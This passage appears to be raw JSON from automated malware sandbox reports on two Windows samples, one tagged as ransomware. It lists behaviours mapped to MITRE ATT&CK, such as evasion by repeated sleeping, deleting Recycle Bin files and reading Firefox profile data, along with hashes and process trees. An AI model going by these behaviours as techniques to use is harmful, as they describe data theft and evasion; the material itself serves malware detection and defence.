malware", "description": "Found string \"\\Device\\HarddiskVolume2\\DosDevices\\C:\\??\\Volume{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}\" (Indicator: \"\\DosDevices\\c:\"; Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NETLOGON\\PARAMETERS\"; Key: \"EXPECTEDDIALUPDELAY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLE5ED840BB38324A5182698C316446]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00004056.00000001.194804.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetModuleHandleA\n GetCommandLineW\n GetCommandLineA\n GetFileAttributesW\n GetProcAddress", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" claimed CRC 191944 while the actual is CRC 184494", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4728122 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4728324 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4743389 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4744111 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4948228 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-4948491 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-5150787 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-5151125 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6179916 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6180169 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6395947 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6401909 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6646487 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6646750 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6849044 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-6849319 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7051578 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7051841 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7254084 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7254358 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7456692 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7457004 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7659206 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7659437 [PID: 4056]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" queried SystemProcessInformation at 00000000-00004056-00000105-7861749 [PID: 4056]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has section name .text with entropy \"6.61353097254\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has section name .data with entropy \"7.98879035773\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has section name .pdata with entropy \"7.69515885772\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has section name .reloc with entropy \"6.72853329511\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Thread ID: 3772) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"23b818\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1441364\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"23b868\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1441364\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-109", "type": 6, "relevance": 10, "name": "Calls an API typically used to determine the valid logical drives on the computer", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"260\"\n \"lpBuffer\": \"C:\\\\\"}\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"0\"}\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"9\"\n \"lpBuffer\": \"C:\\\\\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-10", "type": 8, "relevance": 5, "name": "The input sample dropped very many files", "description": "The input sample dropped 725 files (often an indicator for ransomware)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.UF0SZW0WS\"; Key: \"(DEFAULT)\"; Value: \"Uf0SZw0ws\"), \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\UF0SZW0WS\\DEFAULTICON\"; Key: \"(DEFAULT)\"; Value: \"%ALLUSERSPROFILE%\\Uf0SZw0ws.ico\"), \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"GLOBALASSOCCHANGEDCOUNTER\"; Value: \"65000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\desktop.ini\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\" with delete access\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opened \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" marked \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\ZZZZZZZZZZZ\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"WmiPrvSE.exe\" (Indicator: \"wmiprvse.exe\"; in Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp, 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")\n Found string \"wmiprvse.exe\" (Indicator: \"wmiprvse.exe\"; in Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp, 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-96", "type": 6, "relevance": 10, "name": "Tries to steal browser sensitive information (file access)", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\temporary\\https+++www.google.com^privateBrowsingId=1\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\idb\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\sessionstore-backups\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-widevinecdm\\1.4.8.1008\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-gmpopenh264\\1.7.1\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\archived\\2023-08\\\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\crashes\\\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5
https://hybrid-analysis.com/sample/37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5
Hybrid Analysis - Ransomware
{"size": 606088, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5", "sha256": "37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 143, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606092, "sha256": "681c5b29d47267ee1b6705e0c6fe2acfed22fcf23202308326e314e395f044ea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 6044)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005304", "name": "37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe", "normalized_path": "C:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe", "sha256": "37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5", "av_label": "Trojan.Generic", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00006104", "parentuid": "00000000-00005304", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe *", "sha256": "681c5b29d47267ee1b6705e0c6fe2acfed22fcf23202308326e314e395f044ea"}, {"uid": "00000000-00006044", "parentuid": "00000000-00006104", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZTYZVG", "sha256": "681c5b29d47267ee1b6705e0c6fe2acfed22fcf23202308326e314e395f044ea"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", 